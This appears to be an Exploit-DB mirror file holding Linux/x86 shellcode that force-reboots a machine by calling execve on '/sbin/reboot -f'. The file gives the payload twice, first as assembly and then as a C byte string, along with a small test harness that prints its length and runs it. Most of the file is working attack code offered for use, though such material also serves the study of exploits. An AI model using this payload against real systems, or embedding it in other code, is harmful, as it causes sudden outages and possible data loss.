exploit-db-mirror/shellcodes/linux_x86/43725.c
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

44 lines
No EOL
1.1 KiB
C

**********************************************
* Linux/x86 Force Reboot shellcode 36 bytes *
**********************************************
* Author: Hamza Megahed *
**********************************************
* Twitter: @Hamza_Mega *
**********************************************
* blog: hamza-mega[dot]blogspot[dot]com *
**********************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
**********************************************
xor %eax,%eax
push %eax
push $0x746f6f62
push $0x65722f6e
push $0x6962732f
mov %esp,%ebx
push %eax
pushw $0x662d
mov %esp,%esi
push %eax
push %esi
push %ebx
mov %esp,%ecx
mov $0xb,%al
int $0x80
**********************************************
#include <stdio.h>
#include <string.h>
char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e"
"\x2f\x72\x65\x68\x2f\x73\x62\x69\x89\xe3"
"\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53"
"\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}